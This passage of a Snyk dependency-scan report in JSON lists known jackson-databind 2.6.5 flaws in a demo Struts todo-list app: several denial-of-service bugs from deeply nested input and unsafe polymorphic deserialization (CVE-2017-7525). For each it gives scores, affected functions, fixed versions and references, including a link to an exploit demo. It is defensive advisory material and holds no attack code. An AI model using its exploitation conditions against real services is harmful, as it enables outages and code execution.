- "2.12.6.1", - "2.13.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when using nested objects." - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", - "className": "UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2816", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/3416", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.056720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", - "epssDetails": { - "percentile": "0.60309", - "probability": "0.00218", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36518" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-03-11T13:26:43.073121Z", - "functions_new": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-11T13:18:25Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-03-11T14:24:04Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.929583Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3582", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.201956Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", - "epssDetails": { - "percentile": "0.66401", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42004" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:21:18.588353Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:07:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T10:05:31.043255Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.261115Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", - "title": "Chromium Bugs" - }, - { - "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", - "title": "Documentation" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3590", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.284440Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", - "epssDetails": { - "percentile": "0.65501", - "probability": "0.00252", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42003" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:41:44.046865Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:22:10Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T09:54:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.258948Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.9)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.9" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1599", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.167922Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", - "epssDetails": { - "percentile": "0.97700", - "probability": "0.57112", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-7525" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qxxx-2pp7-5hmx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-09-14T14:43:48.569000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-10T21:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-09-14T14:43:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.385289Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1680", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1737", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 